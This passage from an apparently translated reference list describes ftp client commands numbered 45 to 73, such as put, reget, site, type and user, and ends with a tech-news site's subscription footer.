45.put local-file [remote-file]: transfers the local file local-file to a remote host.

46.pwd: displays the current working directory of the remote host.

47.quit: with bye, exit the ftp session.

48.quote arg1,arg2...: sends the parameters verbatim to the remote ftp server, such as quote syst.

49.recv remote-file [local-file]: same as get.

50.reget remote-file [local-file]: similar to get, but if local-file exists, the transmission is resumed from the last transmission interruption.

51.rhelp [cmd-name]: request help from a remote host.

52.rstatus [file-name]: if no file name is specified, the status of the remote host is displayed, otherwise the file status is displayed.

53.rename [from] [to]: change the file name of the remote host.

54.reset: clears the answer queue.

55.restart marker: restart get or put from the specified flag marker, such as restart 130.

56.rmdir dir-name: delete the remote host directory.

57.runique: set the file name to be stored uniquely. If the file exists, add the suffix. 1,. 2 after the original file.

58.send local-file [remote-file]: same as put.

59.sendport: sets the use of the PORT command.

60.site arg1,arg2...: sends parameters verbatim to the remote ftp host as SITE commands.

61.size file-name: displays the file size of the remote host, such as site idle 7200.

62.status: displays the current ftp status.

63.struct [struct-name]: set the file transfer structure to struct-name, using the stream structure by default.

64.sunique: sets the remote host file name store to only one (corresponding to runique).

65.system: displays the operating system type of the remote host.

66.tenex: set the file transfer type to the desired type of the TENEX machine.

67.tick: sets the byte counter for transfer.

68.trace: set up package tracking.

69.type [type-name]: sets the file transfer type to type-name, defaults to ascii, such as type binary, and sets the binary transfer mode.

70.umask [newmask]: set the default umask of the remote server to newmask, such as: umask 3

71.user user-name [password] [account]: indicate your identity to the remote host. When you need a password, you must enter a password, such as user anonymous my@email.

72.verbose: with the-v parameter of the command line, that is, setting the detailed reporting mode, all responses from the ftp server will be displayed to the user. The default is on.

73. [cmd]: same as help.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.